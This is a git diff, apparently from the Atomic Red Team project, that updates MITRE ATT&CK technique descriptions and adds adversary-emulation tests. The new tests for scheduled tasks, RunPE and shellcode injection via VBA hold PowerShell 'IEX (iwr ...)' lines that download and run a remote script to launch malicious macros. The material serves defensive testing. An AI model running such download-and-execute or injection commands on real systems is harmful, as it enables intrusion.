- It is different from other forms of spearphishing in that it employs the use
- of links to download malware contained in email, instead of attaching malicious
- files to the email itself, to avoid defenses that may inspect email attachments.
- \n\nAll forms of spearphishing are electronically delivered social engineering
- targeted at a specific individual, company, or industry. In this case, the
- malicious emails contain links. Generally, the links will be accompanied by
- social engineering text and require the user to actively click or copy and
- paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204).
- The visited website may compromise the web browser using an exploit, or the
- user will be prompted to download applications, documents, zip files, or even
- executables depending on the pretext for the email in the first place. Adversaries
- may also include links that are intended to interact directly with an email
- reader, including embedded images intended to exploit the end system directly
- or verify the receipt of an email (i.e. web bugs/web beacons). Links may also
- direct users to malicious applications designed to [Steal Application Access
- Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in
- order to gain access to protected applications and information.(Citation:
+ in an attempt to gain access to victim systems. Spearphishing with a link
+ is a specific variant of spearphishing. It is different from other forms of
+ spearphishing in that it employs the use of links to download malware contained
+ in email, instead of attaching malicious files to the email itself, to avoid
+ defenses that may inspect email attachments. \n\nAll forms of spearphishing
+ are electronically delivered social engineering targeted at a specific individual,
+ company, or industry. In this case, the malicious emails contain links. Generally,
+ the links will be accompanied by social engineering text and require the user
+ to actively click or copy and paste a URL into a browser, leveraging [User
+ Execution](https://attack.mitre.org/techniques/T1204). The visited website
+ may compromise the web browser using an exploit, or the user will be prompted
+ to download applications, documents, zip files, or even executables depending
+ on the pretext for the email in the first place. Adversaries may also include
+ links that are intended to interact directly with an email reader, including
+ embedded images intended to exploit the end system directly or verify the
+ receipt of an email (i.e. web bugs/web beacons). Links may also direct users
+ to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s,
+ like OAuth tokens, in order to gain access to protected applications and information.(Citation:
Trend Micro Pawn Storm OAuth 2017)"
name: Spearphishing Link
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -55501,6 +61222,12 @@ initial-access:
url: https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks
description: Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication
in Advanced Social Engineering Attacks. Retrieved October 4, 2019.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ modified: '2020-10-18T01:53:39.818Z'
+ created: '2020-03-02T19:15:44.182Z'
x_mitre_platforms:
- Linux
- macOS
@@ -55512,7 +61239,7 @@ initial-access:
Because this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- Packet capture
- Web proxy
@@ -55541,39 +61268,38 @@ initial-access:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Spearphishing via Service
description: "Adversaries may send spearphishing messages via third-party services
- in an attempt to elicit sensitive information and/or gain access to victim
- systems. Spearphishing via service is a specific variant of spearphishing.
- It is different from other forms of spearphishing in that it employs the use
- of third party services rather than directly via enterprise email channels.
- \n\nAll forms of spearphishing are electronically delivered social engineering
- targeted at a specific individual, company, or industry. In this scenario,
- adversaries send messages through various social media services, personal
- webmail, and other non-enterprise controlled services. These services are
- more likely to have a less-strict security policy than an enterprise. As with
- most kinds of spearphishing, the goal is to generate rapport with the target
- or get the target's interest in some way. Adversaries will create fake social
- media accounts and message employees for potential job opportunities. Doing
- so allows a plausible reason for asking about services, policies, and software
- that's running in an environment. The adversary can then send malicious links
- or attachments through these services.\n\nA common example is to build rapport
- with a target via social media, then send content to a personal webmail service
- that the target uses on their work computer. This allows an adversary to bypass
- some email restrictions on the work account, and the target is more likely
- to open the file since it's something they were expecting. If the payload
- doesn't work as expected, the adversary can continue normal communications
- and troubleshoot with the target on how to get it working."
+ in an attempt to gain access to victim systems. Spearphishing via service
+ is a specific variant of spearphishing. It is different from other forms of
+ spearphishing in that it employs the use of third party services rather than
+ directly via enterprise email channels. \n\nAll forms of spearphishing are
+ electronically delivered social engineering targeted at a specific individual,
+ company, or industry. In this scenario, adversaries send messages through
+ various social media services, personal webmail, and other non-enterprise
+ controlled services. These services are more likely to have a less-strict
+ security policy than an enterprise. As with most kinds of spearphishing, the
+ goal is to generate rapport with the target or get the target's interest in
+ some way. Adversaries will create fake social media accounts and message employees
+ for potential job opportunities. Doing so allows a plausible reason for asking
+ about services, policies, and software that's running in an environment. The
+ adversary can then send malicious links or attachments through these services.\n\nA
+ common example is to build rapport with a target via social media, then send
+ content to a personal webmail service that the target uses on their work computer.
+ This allows an adversary to bypass some email restrictions on the work account,
+ and the target is more likely to open the file since it's something they were
+ expecting. If the payload doesn't work as expected, the adversary can continue
+ normal communications and troubleshoot with the target on how to get it working."
id: attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-28T00:04:46.264Z'
+ modified: '2020-10-18T01:55:02.988Z'
created: '2020-03-02T19:24:00.951Z'
x_mitre_data_sources:
- SSL/TLS inspection
- Anti-virus
- Web proxy
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_is_subtechnique: true
x_mitre_detection: "Because most common third-party services used for spearphishing
via service leverage TLS encryption, SSL/TLS inspection is generally required
@@ -55592,8 +61318,30 @@ initial-access:
atomic_tests: []
T1195:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ id: attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Supply Chain Compromise
+ description: "Adversaries may manipulate products or product delivery mechanisms
+ prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
+ chain compromise can take place at any stage of the supply chain including:\n\n*
+ Manipulation of development tools\n* Manipulation of a development environment\n*
+ Manipulation of source code repositories (public or private)\n* Manipulation
+ of source code in open-source dependencies\n* Manipulation of software update/distribution
+ mechanisms\n* Compromised/infected system images (multiple cases of removable
+ media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider
+ Electric USB Malware) \n* Replacement of legitimate software with modified
+ versions\n* Sales of modified/counterfeit products to legitimate distributors\n*
+ Shipment interdiction\n\nWhile supply chain compromise can impact any component
+ of hardware or software, attackers looking to gain execution have often focused
+ on malicious additions to legitimate software in software distribution or
+ update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil
+ 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired
+ victim set (Citation: Symantec Elderwood Sept 2012) or malicious software
+ may be distributed to a broad set of consumers but only move on to additional
+ tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command
+ Five SK 2011) Popular open source projects that are used as dependencies in
+ many applications may also be targeted as a means to add malicious code to
+ users of the dependency. (Citation: Trendmicro NPM Compromise)"
external_references:
- source_name: mitre-attack
external_id: T1195
@@ -55612,7 +61360,7 @@ initial-access:
description: IBM Support. (2017, April 26). Storwize USB Initialization Tool
may contain malicious code. Retrieved May 28, 2019.
- source_name: Schneider Electric USB Malware
- url: https://www.schneider-electric.com/en/download/document/SESN-2018-236-01/
+ url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
description: Schneider Electric. (2018, August 24). Security Notification
– USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
Retrieved May 28, 2019.
@@ -55638,52 +61386,30 @@ initial-access:
url: https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets
description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
- description: "Adversaries may manipulate products or product delivery mechanisms
- prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
- chain compromise can take place at any stage of the supply chain including:\n\n*
- Manipulation of development tools\n* Manipulation of a development environment\n*
- Manipulation of source code repositories (public or private)\n* Manipulation
- of source code in open-source dependencies\n* Manipulation of software update/distribution
- mechanisms\n* Compromised/infected system images (multiple cases of removable
- media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider
- Electric USB Malware) \n* Replacement of legitimate software with modified
- versions\n* Sales of modified/counterfeit products to legitimate distributors\n*
- Shipment interdiction\n\nWhile supply chain compromise can impact any component
- of hardware or software, attackers looking to gain execution have often focused
- on malicious additions to legitimate software in software distribution or
- update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil
- 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired
- victim set (Citation: Symantec Elderwood Sept 2012) or malicious software
- may be distributed to a broad set of consumers but only move on to additional
- tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command
- Five SK 2011) Popular open source projects that are used as dependencies in
- many applications may also be targeted as a means to add malicious code to
- users of the dependency. (Citation: Trendmicro NPM Compromise)"
- name: Supply Chain Compromise
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T12:51:45.574Z'
+ modified: '2020-10-13T12:38:32.426Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.2'
- x_mitre_data_sources:
- - Web proxy
- - File monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Veeral Patel
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
x_mitre_detection: Use verification of distributed binaries through hash checking
or other integrity checking mechanisms. Scan downloads for malicious signatures
and attempt to test software and updates prior to deployment while taking
note of potential suspicious activity. Perform physical inspection of hardware
to look for potential tampering.
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_contributors:
- - Veeral Patel
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Web proxy
+ - File monitoring
+ x_mitre_version: '1.2'
atomic_tests: []
T1199:
technique:
@@ -55736,13 +61462,8 @@ initial-access:
atomic_tests: []
T1078:
technique:
- id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Valid Accounts
- description: |-
- Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
-
- The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078
@@ -55758,8 +61479,13 @@ initial-access:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ description: |-
+ Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
+
+ The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)
+ name: Valid Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -55770,13 +61496,31 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-06-20T22:44:36.043Z'
+ modified: '2020-10-19T16:01:22.724Z'
created: '2017-05-31T21:31:00.645Z'
- x_mitre_is_subtechnique: false
- x_mitre_contributors:
- - Netskope
- - Mark Wee
- - Praetorian
+ x_mitre_version: '2.1'
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
+ x_mitre_defense_bypassed:
+ - Firewall
+ - Host intrusion prevention systems
+ - Network intrusion detection system
+ - Application control
+ - System access controls
+ - Anti-virus
+ x_mitre_detection: |-
+ Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+
+ Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_effective_permissions:
+ - User
+ - Administrator
x_mitre_platforms:
- Linux
- macOS
@@ -55787,27 +61531,9 @@ initial-access:
- SaaS
- Office 365
- Azure AD
- x_mitre_effective_permissions:
- - User
- - Administrator
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: |-
- Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
-
- Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
- x_mitre_defense_bypassed:
- - Firewall
- - Host intrusion prevention systems
- - Network intrusion detection system
- - Application control
- - System access controls
- - Anti-virus
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_version: '2.1'
+ x_mitre_contributors:
+ - Netskope
+ - Mark Wee
+ - Praetorian
+ x_mitre_is_subtechnique: false
atomic_tests: []
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
index 4a10e2cb..eff14164 100644
--- a/atomics/T1018/T1018.md
+++ b/atomics/T1018/T1018.md
@@ -2,9 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1018)
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems.
-Specific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain.
-
-Within IaaS (Infrastructure as a Service) environments, remote systems include instances and virtual machines in various states, including the running or stopped state. Cloud providers have created methods to serve information about remote systems, such as APIs and CLIs. For example, AWS provides a DescribeInstances API within the Amazon EC2 API and a describe-instances command within the AWS CLI that can return information about all instances within an account.(Citation: Amazon Describe Instances API)(Citation: Amazon Describe Instances CLI) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project, and Azure's CLI az vm list lists details of virtual machines.(Citation: Google Compute Instances)(Citation: Azure VM List)
+Specific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain.
## Atomic Tests
diff --git a/atomics/T1053.005/T1053.005.md b/atomics/T1053.005/T1053.005.md
index 73433250..85e5a7d6 100644
--- a/atomics/T1053.005/T1053.005.md
+++ b/atomics/T1053.005/T1053.005.md
@@ -16,6 +16,8 @@ An adversary may use Windows Task Scheduler to execute programs at system startu
- [Atomic Test #4 - Powershell Cmdlet Scheduled Task](#atomic-test-4---powershell-cmdlet-scheduled-task)
+- [Atomic Test #5 - Task Scheduler via VBA](#atomic-test-5---task-scheduler-via-vba)
+
@@ -155,4 +157,52 @@ Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1
+
+
+
+## Atomic Test #5 - Task Scheduler via VBA
+This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within
+30 - 40 seconds after this module has run
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ms_product | Maldoc application Word | String | Word|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Microsoft #{ms_product} must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
+```
+
+
+
+
diff --git a/atomics/T1053.005/T1053.005.yaml b/atomics/T1053.005/T1053.005.yaml
index 4594e14d..e7fee8c7 100644
--- a/atomics/T1053.005/T1053.005.yaml
+++ b/atomics/T1053.005/T1053.005.yaml
@@ -101,7 +101,7 @@ atomic_tests:
cleanup_command: |
Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1
- name: Task Scheduler via VBA
- auto_generated_guid:
+ auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
description: |
This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within
30 - 40 seconds after this module has run
diff --git a/atomics/T1055.012/T1055.012.md b/atomics/T1055.012/T1055.012.md
index 4cd266ca..13759f6c 100644
--- a/atomics/T1055.012/T1055.012.md
+++ b/atomics/T1055.012/T1055.012.md
@@ -10,6 +10,8 @@ This is very similar to [Thread Local Storage](https://attack.mitre.org/techniqu
- [Atomic Test #1 - Process Hollowing using PowerShell](#atomic-test-1---process-hollowing-using-powershell)
+- [Atomic Test #2 - RunPE via VBA](#atomic-test-2---runpe-via-vba)
+
@@ -49,4 +51,51 @@ Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
+
+
+
+## Atomic Test #2 - RunPE via VBA
+This module executes calc.exe from within the WINWORD.EXE process
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ms_product | Maldoc application Word | String | Word|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit"
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Microsoft #{ms_product} must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
+```
+
+
+
+
diff --git a/atomics/T1055.012/T1055.012.yaml b/atomics/T1055.012/T1055.012.yaml
index 6bef6dbc..de8d7afe 100644
--- a/atomics/T1055.012/T1055.012.yaml
+++ b/atomics/T1055.012/T1055.012.yaml
@@ -34,7 +34,7 @@ atomic_tests:
Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
name: powershell
- name: RunPE via VBA
- auto_generated_guid:
+ auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
description: |
This module executes calc.exe from within the WINWORD.EXE process
supported_platforms:
diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md
index 30321a38..dc781f76 100644
--- a/atomics/T1055/T1055.md
+++ b/atomics/T1055/T1055.md
@@ -10,6 +10,8 @@ More sophisticated samples may perform multiple process injections to segment mo
- [Atomic Test #1 - Process Injection via mavinject.exe](#atomic-test-1---process-injection-via-mavinjectexe)
+- [Atomic Test #2 - Shellcode execution via VBA](#atomic-test-2---shellcode-execution-via-vba)
+
@@ -57,4 +59,50 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
+
+
+
+## Atomic Test #2 - Shellcode execution via VBA
+This module injects shellcode into a newly created process and executes. By default the shellcode is created,
+with Metasploit, for use on x86-64 Windows 10 machines.
+
+Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office
+is required.
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The 64-bit version of Microsoft Office must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+ $wdApp = New-Object -COMObject "Word.Application"
+ $path = $wdApp.Path
+ Stop-Process -Name "winword"
+ if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
+```
+
+
+
+
diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml
index b97c2f1d..3d75a255 100644
--- a/atomics/T1055/T1055.yaml
+++ b/atomics/T1055/T1055.yaml
@@ -35,7 +35,7 @@ atomic_tests:
name: powershell
elevation_required: true
- name: Shellcode execution via VBA
- auto_generated_guid:
+ auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048
description: |
This module injects shellcode into a newly created process and executes. By default the shellcode is created,
with Metasploit, for use on x86-64 Windows 10 machines.
diff --git a/atomics/T1056.001/T1056.001.md b/atomics/T1056.001/T1056.001.md
index c1e605f5..90768a2d 100644
--- a/atomics/T1056.001/T1056.001.md
+++ b/atomics/T1056.001/T1056.001.md
@@ -7,7 +7,8 @@ Keylogging is the most prevalent type of input capture, with many different ways
* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
* Reading raw keystroke data from the hardware buffer.
* Windows Registry modifications.
-* Custom drivers.
+* Custom drivers.
+* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks)
## Atomic Tests
diff --git a/atomics/T1056.002/T1056.002.md b/atomics/T1056.002/T1056.002.md
index 2a4d379f..a5a12710 100644
--- a/atomics/T1056.002/T1056.002.md
+++ b/atomics/T1056.002/T1056.002.md
@@ -1,6 +1,6 @@
# T1056.002 - GUI Input Capture
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1056/002)
-Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)).
+Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).
Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as AppleScript(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and PowerShell(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015).
diff --git a/atomics/T1059.002/T1059.002.md b/atomics/T1059.002/T1059.002.md
index aa4127f1..f748438d 100644
--- a/atomics/T1059.002/T1059.002.md
+++ b/atomics/T1059.002/T1059.002.md
@@ -1,10 +1,12 @@
# T1059.002 - AppleScript
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/002)
-Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. (Citation: Apple AppleScript) These AppleEvent messages can be easily scripted with AppleScript for local or remote execution.
+Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
-osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
+Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript)
-Adversaries can use this to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006)(Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here".
+AppleScripts do not need to call osascript to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility.
+
+Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)
## Atomic Tests
diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md
index 6c5c879f..334ad38e 100644
--- a/atomics/T1059.003/T1059.003.md
+++ b/atomics/T1059.003/T1059.003.md
@@ -14,7 +14,7 @@ Adversaries may leverage cmd.exe to execute various commands and pa
## Atomic Test #1 - Create and Execute Batch Script
-Creates and executes a simple batch script. Upon execution, CMD will briefly launh to run the batch script then close again.
+Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again.
**Supported Platforms:** Windows
diff --git a/atomics/T1059.005/T1059.005.md b/atomics/T1059.005/T1059.005.md
index eae563f3..8863238d 100644
--- a/atomics/T1059.005/T1059.005.md
+++ b/atomics/T1059.005/T1059.005.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/005)
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
-Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Office applications.(Citation: Microsoft VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
